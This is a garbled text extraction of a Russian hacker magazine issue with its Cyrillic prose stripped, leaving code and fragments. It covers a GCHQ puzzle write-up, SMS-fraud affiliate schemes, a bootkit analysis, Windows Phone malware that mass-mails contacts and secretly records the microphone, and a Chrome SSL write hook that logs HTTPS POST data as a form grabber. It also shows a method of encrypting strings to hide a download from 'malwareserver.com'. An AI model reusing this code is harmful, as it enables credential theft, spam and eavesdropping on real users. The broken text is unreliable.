HEX- ( ) - Can
You Crack It?. HEX-,
, ,
ASCII,
.
HEX-
IDA Pro.
- . IDA
x86. ,
.
, .
256 ,
0 255,
,

RC4
8 0xDEADBEEF ( ).
, ,
.
, esp,
,

, ,
0xAAAAAAAA.
DWORD, 0xAAAAAAAA.
,
0xBBBBBBBB.
( ) .

, ,
.
iTXt PNG- ( UTF-8).
Base64
Comment ( ).
, ( )
,
:
GET /15b436de1f9107f3778aad525e5d0b20.js
HTTP/1.1

GET .
, . exe-,

,
( IDA)
:
__asm
{
int 3;
mov eax, array; array
call eax;
}

, jmp ( ) .
. , .

PNG- -

. PNG,
(
).

SECOND STEP

.
,
,
.
, (r0...
r3) ,

(cs ds ), -

UNIX CRYPT()
crypt *nix
,
.

DES (Data
Encryption Standard).
,
, , 7 .
7 56-
DES,
.


DES . .
,
25 .
, crypt ,
DES.
.

12 .

Base64.

keygen



(flg),
(ip).

, (
hlt, )
: mod 0 mod 1. ,

, ,
.

.

, cs ds . , ,
add r[5], 12, ,
,
(

So you did it

cs,
r5).
far jump ip.
, , ,

, ip
.
.

JavaScript, ,
,
. C.
,
, , :-).
(
hlt)
GET:

GET /da75370fe15c4148bd4ceec861fbdaa5.exe
HTTP/1.0

THIRD STEP
GET- , .
,
Cygwin. ,
,
keygen.exe,
.
. keygen URL
. :

licence.txt, ,
.
,
Stage one licence key Stage two licence key,



,
.
-


,
,
. .

,
,
,
,

.
,

,

,



- .
, ,

, ,
,
,

.

,
mov, movzx, add, xor, shl, shr
. ., (
).
,

,

.
,
.


(SBox'), ,
,
(
), ,
() . .
-.

,
.
,



(key schedule) /

.
(

key shedule
).


,
, .

crypt ( Cygwin)
. ,

, ,
. IP
(URL ) DNS.
, URL :
canyoucrackme.co.uk. keygen.exe GET- :

GET-
:


key.txt,
So you did it
, ,
,
,
, ,
.

SUMMARY
GET /%s/%08X/%08X/%08X/key.txt HTTP/1.0

, - .

,
,
.
,
jump.

DWORD- firmware ( ).
,
,
7z, . , , ,
, .

RC4

GET /hqDTK7b8K2rvw/A3BFC2AF/D2AB1F05/
DA13F110/key.txt HTTP/1.0


,
-
.
,
. , GCHQ
, everyday heroes, ,



.
.
. z

RC4 ( ARC4)


.
,
RSA Security, 1987 . RC4 ,

.
8
,
0 255 (S)
: i j. RC4 :
(KSA)
. S
40 256 . KSA
:
for i from 0 to 255
    S[i] := i
endfor
j := 0
for i from 0 to 255
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap values of S[i] and S[j]
endfor

.
:
i := 0
j := 0
while GeneratingOutput:
    i := (i + 1) mod 256
    j := (j + S[i]) mod 256
    swap values of S[i] and S[j]
    K := S[(S[i] + S[j]) mod 256]
    output K
endwhile

AES


RC4
SSL,
WEP, Adobe PDF
Microsoft Office. ,

. ,

PDF- RC4
40 ,
.
MS Office -
RC4


life4u

:
SMS

INFO


-.
,

.

30 !
-
?
,
SMS, ?
?


? -



, .

, - ,

,
(,
1234).
SMS, -

, .
,
,
. SMS-
SMS-.


,
. SMS

( WebMoney .)
:
(,
) ,

-. SMS
. , , ,
, , -

?
, ,
,
. ,
? ,

.
,
, ,
(
, -!)
,


.
, ,
.
?


, , ,
.
,

.
(,

,
,
,
),
.

.
,
,
,

.



SMS-.
50%
, , , . ,

( , ).
SMS- ,
,
, .
(,
, . .), / (, ,
, -
. .).
.
,
SMS-,
web-
.
,
.


.
SMS-.
, , , . , , .
,

. SMS-
(, ,
),
. ,
.

, (,
).
- (,
) ,
, , , -

depositfiles


?


,
.
.
-

,
, - .
,
.
,
(,

),
IP-
,
.


,
.
, , ,
, , ,

,
!

, . SMS- ,
.

( ).
24 , ,
(
,
).
? ,

, , .
50
, ? , ,
( ,
, ).
, ,
,
.
. , -

,
- , ,
?. , ,
SMS,
,
,
.
,
? ? .
,
, .

,
,
?
?
, .
, 1. , ,
( ,
, , ). , .
? , :
,
.
, , , , .
, ,
! , :
.
, ,
, ,
!
,
, -
. ,
, ,
-, ,



. ,
, !
(welcome back,
!). OK,
, .

.
2.


,
,
.

, ,
,
, ,
.
!
,
,
.
. ,
.
:

?
100 . ,
,
,
.
, ,
-
, ,
( ?)
.
, ,
,
.
, ,
.

.
! , ,
,
.
: http://
loh.ru/?pid=15991&subid=25483.
, . ,
, -
,
.
,
,
,
(
][),
.

. , ,
.
, , .
, ( ).
.
SEO-
. SEO-

, .

.
, , ,
, . .
. (
,
). , ! z


Jinconvert.ru .
: , ,
, ,

. , ! , ,
, 5 %
-.


Loadpays.ru ,
,
-.
.
,

.

Convert-plus.ru ( info-center.
cc) ,

,
. .


(icq 884888, http://snipper.ru)

X-Tools


:
NEOx.
URL:
bit.ly/xSLk8n.
:
Windows.

:
famatech.
URL:
radmin.ru/products/
ipscanner.
:
Windows.

:
Suicide[Vll].
URL:
r00t.in/showthread.
php?t=18056.
:
Windows.

PE TOOLS


ADVANCED IP SCANNER


DEATH-MOBILE

PE Tools PE/PE+ (64bit).


:
PE-, Task Viewer, Win32
PE-, /
. .
1. Task Viewer:
(Full, Partial,
Region);
.NET CLR-;
Anti Dump
Protection;
;
;
PE Editor PE Sniffer;
OEP.
2. PE Sniffer:
/;
;
.
3. PE Rebuilder:
PE-;
PE-.
4. PE Editor:
DOS-;
PE+ (64bit);
CRC;
/
.

- Radmin,

Advanced IP Scanner.
, .
:
1. .
, , , HTTP, HTTPS FTP,
.
2. Radmin. Radmin,
Radmin Server
. ,
,
Radmin Viewer.
3. .

.
4. Wake-On-LAN.
, Wake-On-LAN.

.

SMS,
. 75 120 . ,
, , , .

Mail.Ru. 100 300
.
,

. :


mymegaemail@mail.ru:passw
login@bk.ru:pass


, ,
. Death-Mobile

(, , ),
, ,
,
.

.


:
al-chemist.
URL:
al-chemist.ru/
dnfinder.html.
:
Windows.

:
Z.Razor (ZerveRTeam).
URL:
www.zerverteam.com.
:
Windows.

DOMAIN NAME FINDER,




Domain Name Finder. ,

. ?
,
!
SEO- .
:
, ;

:
Marcello Pietrelli &
Gianni Baini.
URL:
bit.ly/ukWQSX.
:
Windows.

;

;

;
;

(
) - viagra.
com, -
. ,
-
xakepviagra.com: [a-z]{5,5}viagra.com.
!

:
. .
URL:
z-oleg.com/secur/aps.
:
Windows.


WEB TOOL

FILES TERMINATOR

APS !

Web Tool ,
GET- POST-.
,
/// //- . .
(
Data UserAgent)
:


,
. Files Terminator.

,
, ,
.
, , . ,


,
,
.

:
1. .
2. , HMG IS5.
3. .
4. , P50739-95.
5. , DoD
5220.22-M(E).
6. , VSITR.
7. , RCPM TSSIT OPS-II.
8. .
9. .

APS (Anti Port Scanner) ,


. ( ),
.

. ,

(,
web-).
, .
APS
.
,
:
;

;

;
;
, IDS;
, .

#user# ,
#pass# ,
#md5(user)# md5,
#md5(pass)# md5,
#token1# #token(1-X)# ,
#count# .

, , .
(,
, X )
(
< ).
:
1. source-:
nick;pass .
2. : , .
3. :
.


MALWARE

, Senior malware researcher, ESET

2011


. , :
,
,
.

Load MBR

read mode

Load VBR

read mode

load malicious
MBR/VBR

Load bootmgr

read mode/protected mode

NT kernel
modifications

Load winload.exe
or winresume.exe
read mode/protected mode

load rootkit
driver

Load kernel and


boot start drivers

. 1.


. 2.


. 3. VBR

MBR Code

MBR Code

Partition Table Entry #1


Partition Table Entry #2
Partition Table Entry #3
Partition Table Entry #4

Partition Table Entry #1


Partition Table Entry #2
Partition Table Entry #3
Partition Table Entry #4

MBR Data

MBR Data

Bootmgr Partition

Bootmgr Partition

OS Partition

OS Partition

Unpartitioned Space

Olmasco Partition

Before infecting

Empty Partition Entry

After infecting

Active Partition Entry

Existing Partition Entry

. 4. Olmasco


64- . 2010
64- Win64/Olmarik
(TDL4), Rovnix,
ZeroAccess (update), TDL4 (update), Carberp, Olmasco ( MaxSS). ,


. , . 1.

PoC-,
.
(MBR) ,
, -


. 5. Olmasco

. 6. Olmasco

,
.


. - - ,
.
Stuxnet,
Duqu ( Stuxnet). , ,
,

Stuxnet (, , :)).
Duqu .
, ,
0-day- CVE-2011-3402
,
;).


--! !
, Olmasco.
, VBR
(Volume Boot Record)
. VBR
, . 3.

,
MBR. , , .

, . .
,
(. 4).

.


,
.
. 5.

- . 6.
, IDA Hex-Rays
.

.
. 7.
, Olmasco, TDL4,
-, kdcom.dll.
WinDbg,

. :
(
),
kdcom.dll .
- - ,
Bochs
IDA Pro.
, Olmasco ,
TDL4
.

Load drv32 or drv64

mbr is loaded and executed

Call
KdDebuggerInitialize1
from loaded kdcom.dll

Load VBR of
malicious partition

substitute kdcom.dll with


dbg32 or dbg64

infected VBR is loaded and


executed

Load ntoskrnl.exe,
hal.dll, kdcom.dll,
bootvid.dll ant etc

Load \boot from


malicious file system
\boot is loaded and
executed

distrort /MININT option

Hook BIOS int 13h


handler load original
VBR

Load winload.exe

. 8. !

Substitute EmsEnabled
option with Winpe

VBRof originally active partition


is loaded and executed
Bootmgr is
loaded and
executed

Read bcd

. 7. Olmasco


--! !
Carberp, -.
Carberp ,
.
, .
- Win64/Rovnix,

. Carberp Rovnix -,
.
Carberp ,
.

Continue kernel
initialization

Loal MBR

Load kernel and


boot start drivers

. 9. Carberp


. 10. , - Carberp


(. 9).
, .
, . ,
. (
), ,

, .
:

MS10-073 (win32k.sys KeyboardLayout vuln);


MS10-092 (Task Scheduler vuln);






. 11. Carberp

MS11-011 (win32k.sys SystemDefaultEUDCFont vuln);


NET Runtime Optimization vuln (http://osvdb.org/show/osvdb/71013).

, , . 10.

-
(. 11).
, .
-
.
user-mode-.

, NtQueueApcThread()/NtResumeThread().
Carberp : -, , dll-,
. , , .
. ,
GMER RKU.
Carberp ,


success

Check if
already
infected

Loal MBR

fail

Real mode

Check OS
Version

Win 2000

Load VBR
Real mode

Win XP

Vista/Win7

success

Target of Win64\Rovnix

Check Admin
Privileges
fail

Determine OS
Digit Capacity

Load bootstrap code


real mode / protected mod

Load bootmgr
real mode / protected mod

Install Corresponding
Kernel mode Driver

Call ShellExecuteEx
API with runas

Load winload.exe or
winresume.exe

Overwrite Bootstrap
Code of Active Partition

Initiate System Reboot

real mode / protected mod

. 12. Rovnix

,
x86-, x64-. 2012 , ,
.

!
- Rovnix,
, MBR.
. 12.
-, , Bootstrap-, .
Bootstrap ,
VBR (Volume Boot Record), bootmgr.
. Rovnix, Olmasco,
-, ,
Olmasco, ,
, , , , - .
,
,
.


Load kernel and boot


start drivers

Self Delete and Exit

. 13. Rovnix

, Rovnix , , MBR. , ,
, . ,
.
, SecureBoot Win8,
.

-
,
- .
,
. ,
,
-, ,
,
, . , , , . z


MALWARE

yurembo (yazevsoft@gmail.com)




- ,
, . ,
, MS WM6.5,
,
. !


INFO


MediaElement
(

mediaSound),
XAML-

: <MediaElement Height="120"
Name="mediaSound"
Width="160" />.

WWW
windowsphonehacker.com
,

WP
77.5.

CD

,

.


WP , Windows Phone 7.5



, , - (goo.gl/YbIru),
. , (, Facebook).
, ,
!
, ,
.
,
, -
,
. :
- , ,
.
WP 7
-. ( 2012-), ,
, . Microsoft
,
, .


WINDOWS PHONE

, , . :)
, WP 7,
Windows
Phone Marketplace 99 . ChevronTeam ChevronWP7,
.
, .
WP 7, Mango MS WP 7.5,
, ChevronTeam . ,
. , ,
, . , ! :)

. ,
.
, ,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB,
ZuneDriver, Device

Parameter : ShowInShell , PortableDeviceNameSpaceExcludeFromShell ,


EnableLegacySupport .
WP 7
. , , WP 7.5
. , ,
,
(-).


.
, WP (
MS ;)), , -,
, .
WP .NET Silverlight.
,
API. SMS
.
!
, :
using System.Windows.Navigation;

, Microsoft.Phone.
Tasks, SMS (. ). , :
protected override void OnNavigatedTo(NavigationEventArgs e)
{
SmsComposeTask msgSMS = new SmsComposeTask();
msgSMS.Body = " -";

WINDOWS PHONE
, Microsoft .
1. (
.NET Compact), , ()
.
2.
(chamber).
3.
,
, ,
.


4. . ( ,
, ,
,
?
.)
5.
Windows Phone Marketplace.
6. SSL. ,
, .
7.
ProtectedData ( -

System.Security.Cryptography),
.
8. WP 7 : AES, HMACSHA1,
HMACSHA256, Rfc2898DeriveBytes, RSA,
SHA1, SHA256.
9. , IE,
.
10. , Microsoft,

.

083

MALWARE
msgSMS.To = "1928";
msgSMS.Show();
}

;
.

:)
, ,
:).
, WP 7.5
.
, ,
, . ,
.
. WP- (
, 7.5, SDK
7.1) Silverlight, C#-
Microsoft.Phone.UserData,
.

. , ,
Contacts,
. MainPage InitSearch,
contacts.SearchAsync(String.Empty, FilterKind.DisplayName, null)
.
SearchAsync : (
, ); , ( , ,
None, , ); ,
, null. -


Windows Phone
:
1.

( hash-: = ).
2. .
3. ,

LINQ, / .
,
,
.

ContactsSearchEventArgs.,
SearchCompleted,
MainPage:
contacts.SearchCompleted += new EventHandler<
ContactsSearchEventArgs>(contacts_SearchCompleted)

:
void contacts_SearchCompleted(object sender,
ContactsSearchEventArgs e)
{
int max = e.Results.Count(); //-
string adr;
try { //
for (int i = 0; i < max; i++)
if (e.Results.ElementAt(i).EmailAddresses != null)
{
adr = e.Results.ElementAt(i).
EmailAddresses.First().EmailAddress; //
if (adr != null && adr != "") //
SendEmail(adr); // :)
}
}
catch (Exception ex) { }
}

,
, e-mail- ( ) , ,
SendEmail, .
:
void SendEmail(String adr)
{
EmailComposeTask email = new EmailComposeTask();
email.To = adr;
email.Subject = "Holy mail";
email.Body = "Download my prog";
email.Show();
}

,
( EmailSender).
Overhear2


,
- .
, .
, . ,
! ;)

, , , ,
.
,
(Overhear2, ),
, .
,
Silverlight- WP. C#-
:
using System.IO;
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Audio;
using System.Windows.Threading;
using System.IO.IsolatedStorage;

, FrameworkDispatcher ( , ), , , ,
(
, ),
. MainPage (.
). ,
. ,
Windows Phone
, :).
, .
, . (
) .
,
, . recordingStopped ,
, , ,
( ), .

DispatcherTimer .
xna.

xna, :
DispatcherTimer dt = new DispatcherTimer();
dt.Interval = TimeSpan.FromMilliseconds(33);

, ,
: dt.Tick += new EventHandler(dt_Tick).
dt.Start() .
, ,
. ,

(, 10 000 ),
, .
,
SetupMicrophone. ,
. - ,
, , .
,
.
. , . WriteWavHeader ,
. , microphone.Start()
.
.
,
33 . ,
. , ,
recordingStopped .
,
.
( 500 ) microphone_BufferReady.
. recordingStopped , , ,
.
, : , ?
, ,
, .
, , ,
.
SaveFile() (. ), ,
.
private void SaveFile() { //



, ,
()

.
,
.


,
(dormant), ,

.
(active -> dormant)
tombstoning.
, (terminate)
. ,


:
Launching , Closing
, Deactivating (
) Activating
tombstone. ,

, .

085

MALWARE
using (IsolatedStorageFile isoStorage =
IsolatedStorageFile.GetUserStoreForApplication()){
using (IsolatedStorageFileStream isoStream =
isoStorage.CreateFile(FileName)) {
isoStream.Write(stream.ToArray(), 0,
stream.ToArray().Length);
}
}
}

, ,
.
,
. , wav-.
, :). wav-,
. (goo.gl/ufe3y)
, (
). !
WriteWavHeader,
, ( SetupMicrophone), UpdateWavHeader,
,
, , (
microphone_BufferReady, ,
SaveFile).
wav-. ,
microphone_BufferReady (
recordingStopped), PlayFile
.
:
private void PlayFile() { //
using (var isf =
IsolatedStorageFile.GetUserStoreForApplication()) {
if (isf.FileExists(FileName)) {
using (var isoStream = isf.OpenFile(FileName,
FileMode.Open, FileAccess.Read)) {
mediaSound.Stop();
mediaSound.SetSource(isoStream);
mediaSound.Position=System.TimeSpan.FromSeconds(0);
mediaSound.Volume = 20;
mediaSound.Play();
}
}
}
}

Overhear

,
.
mediaSound.
,
, .
,
.
: , , ( )
( ). Play :
sound = new SoundEffect(stream.ToArray(),
microphone.SampleRate, AudioChannels.Mono);
sound.Play();

! , : , Windows Phone
, . !

Windows Phone 7.5,


.
WP ,
. ,
Marketplace Hub ( ),
. ,
, , ! z


WP 7 .
, ,
. :
1. The Trusted Computing Base (TCB)
.

, - , .


, ,
,

Windows Phone Marketplace,

.
2. The Elevated Rights Chamber (ERC) .
,
, ,
.


.
3. The Standard Rights Chamber (SRC)
, MS Office
Mobile, Internet Explorer 9 . .
4. The Least Privileged Chamber (LPC) ,
Microsoft.
, .


Preview

088

GOOGLE CHROME
,


.
Internet Explorer Mozilla Firefox

.
Google Chrome
, , . -,
,
,

.

094



,

. Python!

UNIXOID

108


Fedora

.
?

SYN\ACK

114



DLP-. - .


110



Linux-,

.

FERRUM

124



Django-
? .

130

!

. ,
.


(seserega@gmail.ru, blotlore.blogspot.com)

Google Chrome



GOOGLE

WWW
goo.gl/Cj4Pl
OllyDbg

.
goo.gl/rdAfo
,
IDA.
goo.gl/uIqMb

,


Chrome.
goo.gl/sZWwZ
.

INFO



__declspec(naked),



.


,

. Internet
Explorer Mozilla Firefox
.
Google Chrome ,
.

Google Chrome

. 1. OllyDbg

, ,

. IE , HttpSendRequest,
wininet.dll, Firefox PR_Write nspr4.dll, ,
.

. 2. SSL-

SRV*c:\code\symbols*http://msdl.microsoft.com/download/symbols;SRV*c:\code\symbols*http://chromium-browser-symsrv.commondatastorage.googleapis.com

Google Chrome , WSASend. , .


,
SSL- .
OllyDbg
, Google

(goo.gl/8SgW2, Chrome ).
,
, ++.
, , ssl socket.

ssl_socket.h (goo.gl/6cw0w), ,
. , ssl
socket, ssl_client_socket_nss.cc, ssl_
client_socket_openssl.cc ssl_client_socket_win.cc. ,
Firefox PR_Write,
.
ssl_client_socket_nss.cc.
, , .
,
SSLClientSocketWin::Write, - PR_Write. , , :
SSLClientSocketOpenSSL::Write SSLClientSocketWin::Write. .
. Google
Chrome, goo.gl/fwt1S.
, :
1. WinDBG.
2. File Symbol File Path.
3. :


4.
5.
6.
7.

c:\code\symbols ,
.
View.
Command, Registers Disassembly.
Chrome.
File Attach to a Process...
chrome.exe .

x chrome*!* SSLClientSocketNSS::Write
( Command)
SSLClientSocketNSS::Write, SSLClientSocketWin::Write. (breakpoints) Gmail-.
SSLClientSocketNSS
::Write.
,
int SSLClientSocketNSS::Write(
IOBuffer* buf,
int buf_len,
const CompletionCallback& callback
)

,
POST-. ,
IOBuffer:
class NET_EXPORT IOBuffer :
public base::RefCountedThreadSafe<IOBuffer>
{
public:
IOBuffer();
explicit IOBuffer(int buffer_size);
char* data() { return data_; }
protected:
friend class base::RefCountedThreadSafe<IOBuffer>;
explicit IOBuffer(char* data);
virtual ~IOBuffer();
char* data_;
};

, -


. 3. SSL-

,
. OllyDbg
SSLClientSocketNSS::Write (. 1),
DWORD (. 2).
, DWORD ( IOBuffer+8) (char*),
HTTPS- (. 3).
, POST , . ,
SSLClientSocketNSS::Write (. 4).
POST , .
.


,
, .
, ,
, , GetProcAddress
.
PE-, , chrome.exe
chrome.dll. ,
SSLClientSocketNSS::Write dll.
, .


- .

. (
, )
14 , chrome.dll .

chrome_1c30000!net::SSLClientSocketNSS::Write:
02875a4c 55
push
ebp
02875a4d 8bec
mov
ebp,esp
02875a4f 51
push
ecx
02875a50 53
push
ebx
02875a51 56
push
esi
02875a52 57
push
edi
02875a53 ff7508
push
dword ptr [ebp+8]
02875a56 8bf1
mov
esi,ecx
02875a58 33db
xor
ebx,ebx


(BYTE*),
, . ,
. ?, x.


if(DataCompare((BYTE*)(dwAddress+ i),pbMask,szMask))
return (DWORD)( dwAddress + i );
}
return 0;
}

- , is f*cking unstable.
, , .

. 4. SSLClientSocketNSS::Write

:
char* Sign = "\x55\x8B\xEC\x51\x53\x56\x57\xFF\x75\x08
\x8B\xF1\x33\xDB"; // SSLClientSocketNSS::Write
char* Mask="xxxxxxxxxxxxxx"; //
DWORD SSLAdr = FindPattern(ChromeDLL,
Chrome32Size,
(BYTE*)Sign,
Mask); // SSLAdr - SSLClientSocketNSS::Write

:
bool DataCompare( const BYTE* pData,
const BYTE* bMask, const char* szMask )
{
for( ; *szMask; ++szMask, ++pData, ++bMask )
{
if( *szMask == 'x' && *pData != *bMask )
return false;
}
return ( *szMask ) == NULL;
}
DWORD FindPattern ( DWORD dwAddress,
DWORD dwSize, BYTE* pbMask, char* szMask )
{
for( DWORD i = NULL; i < dwSize; i++ )
{

K, , .
. , , ,
. , , 5 JMP _.
5 ,
JMP. . ,

, , .
. ,
JMP , .
.
.

PAGE_EXECUTE ( VirtualProtect),
5 ( )
. 5 ,
asm- ,
. ,
, -
.
, JMP, [ +
]. ,
JMP _.
,
,
( ).
-, ,
:


. ,
openws akademiker
PR_Write ( - ),
Chrome
Zeus ( , ).
PR_Write
//
char* Sign = "\x8b\x4c\x24\x04\x57\xe8\x00\x00\x00\x00\x8b
\xf8\x85\xff\x75\x05\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xb7
\x38\x02\x00\x00";
//
char* Mask="xxxxxx????xxxxxxxxxxxxxxxxxxx";


, PR_Write
, combined_
methods, ,
WinDBG SSLClientSocketNSS::DoPayload
Write (. 5).
,
. ,
combined_methods PR_Write
OCh . SpyEye
, .
TranslateMessage, ,
, ZwReadFile,
(
goo.gl/xTX9j). , .


. 5. Combined_methods SSLClientSocketNSS::DoPayloadWrite

__declspec (naked) int Hooked_SSLWrite(


DWORD buf,
int buf_len,
void* callback)
{
static bool IsPostData;

WriteLog(LogFile,*(char**)(buf+8));
IsPostData=true;
}
else if ((strncmp((LPCSTR)*(char**)(buf+8),
"GET", lstrlen("GET"))==0)|| IsPostData)
{
WriteLog(LogFile,*(char**)(buf+8));
IsPostData=false;
}

__asm
{
push ebp;
mov ebp,esp;
push ebx;
push esi;
push edi;
push ecx;//argument
}
//
//
ChromeHook.UnsetSplicing();
TrueSSLWrite = (SSLWrite)ChromeHook.GetHookedFunc();
//
__asm
{
pop ecx;//argument
mov eax,callback;
push eax;
mov eax,buf_len;
push eax;
mov eax,buf;
push eax;
call TrueSSLWrite;
push eax;
}
//
ChromeHook.ReSplice();
if((strncmp((LPCSTR)*(char**)(buf+8),
"POST",lstrlen("POST"))==0))
{


__asm
{
pop eax;
pop edi;
pop esi;
pop ebx;
leave;
ret 0Ch;
}
}

__declspec(naked) , ,
ex. , ,
, .

thiscall,
(
Write SSLClientSocketNSS). ecx
,
.

-
( DLL-) !
Google Chrome , ,
.
. , ,
. . z


>> coding

Peter and the Wolf (peterandthewolf@real.xakep.ru)

/++


( )
,
.
, ,
, .


.
WWW
Cog
:
nedbatchelder.com/
code/cog.

INFO


,

python-

cog.


.
,
.
? , , ? , ():

URLDownloadToFile(NULL, "http://malwareserver.com/test.exe",
"C:\\test.exe", 0, NULL);

,
URLDownloadToFile,
.rdata .data . hex- . , ,
, - :
URLDownloadToFile(
NULL,
Decrypt("\x0E\x12\x12\x16\x5C ..."),
Decrypt("\x25\x5C\x3A\x12\x03 ..."),
0,
NULL);

,
. - , ,
, .
,
, . (
), - .

PYTHON
, , , -
Cog (http://pypi.python.org/pypi/cogapp).
,

. , , Cog
,
,
. , Cog :
// ++
...
/*[[[cog


import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
//[[[end]]]
...

:
// ++
...
/*[[[cog
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
void DoSomething();
void DoAnotherThing();
void DoLastThing();
//[[[end]]]
...

python.exe cog.py -r test.cpp, test.


cpp , !
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
Decrypt("\0x0E\0x12\0x12\0x16\0x5C ...")
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
Decrypt("\0x25\0x5C\0x3A\0x12\0x03 ...")
/*[[[end]]]*/,
0,
NULL);

, Visual
Studio , . ,
Encrypt cog-, .

BIN2H
[[[cog ]]] ,
,
]]] [[[end]]]. Cog ,
,
.
, , ,
. ,
.

out outl ( out, ) cog.
,
python-. ,
.



. Cog
xor:
/*[[[cog
import cog
key = 0x66
def Encrypt(str):
cog.out('Decrypt("')
cog.out("".join(['\\' + ("0x%02X" % (ord(char)^key))
for char in str]))
cog.out('")')
]]]
[[[end]]]*/


URLDownloadToFile Encrypt:
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
/*[[[end]]]*/,
0,
NULL);


, . , Cog

bin2h . bin2h
, , :
def bin2h(filename, valuename):
data = open(filename, 'rb').read()
cog.outl('BYTE %s[] = {' % valuename)
for byte in data:
cog.out('0x%02X, ' % ord(byte))
cog.outl('}')
cog.outl('DWORD %s_size = %d;' % (valuename, len(data)))

, (
PE-), :
//[[[cog bin2h("test.bin", "test")]]]
/*[[[end]]]*/

:
//[[[cog bin2h("test.bin", "test")]]]
BYTE test[] = {
0x23, 0x69, 0x6E, 0x63, 0x6C ...
//
}
DWORD test_size = 7079;
/*[[[end]]]*/,

bin2h
.


, ,
.
, , API . c CorePy
, -
. z


(ivinside.blogspot.com)

,



.
, .


-.
40
...


, .
- . :
, .
, .
?
... !
... ? .
?
, ,
-- .
!
, .
, . ... ( )
!
?


, ,
, , --
. : . :) .
13:

, .
, ,
. , , ,
, , .
.
. ,
?

1 * 1 * 11 = 11
1 * 2 * 10 = 20
1 * 3 * 9 = 27
1 * 4 * 8 = 32
1 * 5 * 7 = 35
1 * 6 * 6 = 36
2 * 2 * 9 = 36
2 * 3 * 8 = 48
2 * 4 * 7 = 56
2 * 5 * 6 = 60
3 * 3 * 7 = 63
3 * 4 * 6 = 72
3 * 5 * 5 = 75
4 * 4 * 5 = 80

, . ,
: 1*6*6 2*2*9. ,
, 36,
, ,
. ,
, , ,
. : ,
.
, .
, , .
(1-6-6 2-2-9) .
, , .

( ). :
,
Python.

Oracle.
cx_Oracle,

Oracle.

, ,
:
, ;
, ;
,
.

, , .
, :
,
;
,
.
,
, . ,
:
1.

2.

, ,
, .

Oracle
. , , .

.
test1 test2,
( )
- :
CREATE TABLE test1(prod VARCHAR(10), price INT);
CREATE TABLE test2(prod VARCHAR(10), price INT);

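import cx_Oracle

# Connect to the database
conn = cx_Oracle.connect('system/qwerty@XE')
cur = conn.cursor()

# Insert the file into the table line by line (bound parameter, no string concatenation)
with open('file.txt') as f:
    for line in f:
        cur.execute("INSERT INTO test VALUES (:s)", s=line.rstrip('\n'))

# Commit the transaction and release the resources
conn.commit()
cur.close()
conn.close()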

,

, .

.


JOIN,
.
LEFT JOIN ,
(), ,
().
. ,
.
WHERE test2.prod IS NULL, , , .
:
SELECT test1.* FROM test1 LEFT JOIN test2
    ON test1.prod = test2.prod AND test1.price = test2.price
WHERE test2.prod IS NULL;

,
JOIN, , ,
, -



1. ,
,
, None,
.
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}

. .
,
. ,
, ,
. .

, - .
:
. ,
.
, .

2. :
def myappend(a = [], num = 0):
a.append(num)
print a
,
:
>>>
>>>
>>>
>>>
>>>
>>>
>>>

a = [1,2,3]
myappend(a)
myappend()
myappend()
a = {1:2, 3:4}
myappend(*a)
myappend(**a)

3. , .
>>> a =
>>> b =
>>> for
<Keeper

Keeper()
Keeper()
i in Keeper.list_instances(): print i
instance at 0x...

4. ?
389/tcp

open

ldap

, .
, *nix,
, chkrootkit.
, , . Chkrootkit
,
.
rkhunter unhide.
, .
http://goo.gl/9HXEt.
GMER RootRepeal.
, , - ,
.


(IDS intrusion detection system).
. ,
.
Snort
Suricata. , , .
- -
(WAF web application firewall),
.

(Anonymous bind OK)

,
.

,
. , .
.
, . ?

, ,
, .

( ,
. .), .
, ,
,
, .

, : l = 2 * pi * R,
R . ,
. R,
l/2, pi * R.
, , ,
3,14 , , , ,
. , .
, , - ! ,
: , ?

,
: , .
:
3 + 5 = 8
5 + 7 = 12
7 + 11 = 18
...

, ,
,
, .
,


, , .
, . ,
,
( , r < 3/pi * R/4) ,
. ,
. ,
R/4 , . , ,
l/2, 12,56 (2 * 3,14 * 4/2). ,
, ,
, !
r < 3/pi * R/4 , ,
.
!
P. S. :
1. ?
2.
?

c , URL (
URL), N . N, , 10.
.
threading,
eventlet, gevent, Twisted .

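# Queue of URLs to download
urlsPool = Queue.Queue(0)
# Fill the queue with the URLs from the file, one per line
urlsFile = open(sys.argv[-1], 'r')
for url in urlsFile:
    url = url.strip()
    if url:
        urlsPool.put(url)
urlsFile.close()
# Start the worker threads
for x in xrange(threads):
    DownloadThread().start()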

.
, .

. , .

, , . ( ,
):
1. (, ).
2. , .
3. .
4.
.
: , ,
(). . .
, , .

threading:
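import sys
import threading
import Queue
import urllib2

# Worker thread: takes URLs from the queue and saves every page to a file
class DownloadThread(threading.Thread):
    def run(self):
        # Browser-like User-Agent header
        headers = {'User-Agent':
                   'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'}
        while True:
            # get_nowait() instead of qsize() + get(): a blocking get() would
            # hang if another thread took the last URL in between
            try:
                url = urlsPool.get_nowait()
            except Queue.Empty:
                break
            # The file is named after the number of URLs left in the queue
            logfile = open(str(urlsPool.qsize()), 'w')
            # Build the request
            req = urllib2.Request(url, None, headers)
            # Download the page and save it
            logfile.write(urllib2.urlopen(req).read())
            logfile.close()

# Check the command line
if len(sys.argv) < 2:
    print 'Usage: downloader.py [-n <number>] FILE\n\
"-n <number>" - number of threads (default 10)'
    sys.exit(1)
# Number of threads
if len(sys.argv) == 4 and sys.argv[1] == '-n':
    threads = int(sys.argv[2])
else:
    threads = 10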


, .
,
. :
? .

100 . :
I : 900
II : 1000 + 100

:
I : 900 + 100
II : 1000 + 100 100

, 10 1
100/11 1000/11 . ( ):
I : (900 + 100/11) + 1000/11
II : (1000 1000/11) + (100 10/11)

:
I : 909,09 + 90,91
II : 909,09 + 90,91

, !
: ,
, ,
. z


